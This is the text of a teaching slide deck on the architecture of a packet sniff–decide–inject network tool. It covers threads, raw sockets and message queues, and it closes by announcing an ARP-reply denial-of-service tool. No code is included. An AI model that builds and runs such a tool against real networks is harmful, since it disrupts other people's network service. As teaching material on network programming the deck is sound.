Architecture of a Proactive
Security Tool
Vivek Ramachandran
What does a proactive tool do?
• Tool makes dynamic decisions at runtime based
on information collected from the network.
• “Sniff – decide – Inject”
• The tool logically is divided into 3 parts:
• The sniffer logic
• The injection logic
• The decision logic
• These three communicate via some IPC
mechanism e.g. pipes, message queues, shared
memory
• This is as cool a tool can get ! :D
Architecture of a Proactive Security Tool
Ethernet Interface
Decide
Action
(6)
Inject packets
(5)
Send output of
decision
Sniff
(3)
Send inputs
(4)
Injector
packets
Sniffer
Create Injector thread
(2)
Create Sniffer thread
Main()
(1)
Architecture of a Proactive Security Tool
1.
2.
3.
4.
5.
6.
7.
Create sniffer thread
Create injector thread
Sniff packets from the network
Send inputs to the decision module
Send output of decision to injector
Inject packets
Goto step 3:
Architecture of a Proactive Security Tool
Multi threaded
programming
1.
2.
3.
4.
5.
6.
7.
Create sniffer thread
Create injector thread
Sniff packets from the network
Send inputs to the decision module
Send output of decision to injector
Inject packets
Goto step 3:
Architecture of a Proactive Security Tool
Raw Sockets
1.
2.
3.
4.
5.
6.
7.
Create sniffer thread
Create injector thread
Sniff packets from the network
Send inputs to the decision module
Send output of decision to injector
Inject packets
Goto step 3:
Architecture of a Proactive Security Tool
IPC – message queues
1.
2.
3.
4.
5.
6.
7.
Create sniffer thread
Create injector thread
Sniff packets from the network
Send inputs to the decision module
Send output of decision to injector
Inject packets
Goto step 3:
Multithreading basics
• Threads are light-weight processes
– only local variables in a function are copied (e.g. each thread
has its own stack)
– most other data is shared between threads
(e.g. global variables & the heap)
– runs in parallel with the main thread
• pthreads is the POSIX threads standard
• pthread_create() is used to create a thread
• Takes a function to execute as input
• Takes an argument to pass to that function
• pthread_join() is used by the parent to wait for daughter
threads to finish execution
• Visit http://www.llnl.gov/computing/tutorials/pthreads/ for
a comprehensive tutorial
IPC – Message Queue basics
• Message Queues are linked lists of
messages maintained by the kernel
• Processes are allowed to read and write
messages from and to a message queue if
they have requisite permissions
• Allows for an asynchronous form of
communication
• For a comprehensive yet easy to
understand tutorial visit
http://beej.us/guide/ipc/mq.html
IPC – Message Queue basics
• msgget() to create a message queue
• Need to use ftok() to create the key
• msgsnd() to send message into a queue
• Message should be of format:
struct message{
long mtype; // Mandatory
char data[1];
…
}
• msgrcv() to receive a message from the
queue
What tools will we make?
• GenericTool.c : A tool which articulates the
architecture discussed in this ppt
• GenericTool-1.c: A modified version of the
above to illustrate message transmission
using message queues
• ArpDos: A tool to illustrate the working of
the above architecture. It does a denial of
service on the network by replying to every
Arp request it sees on the network
Let the games begin !!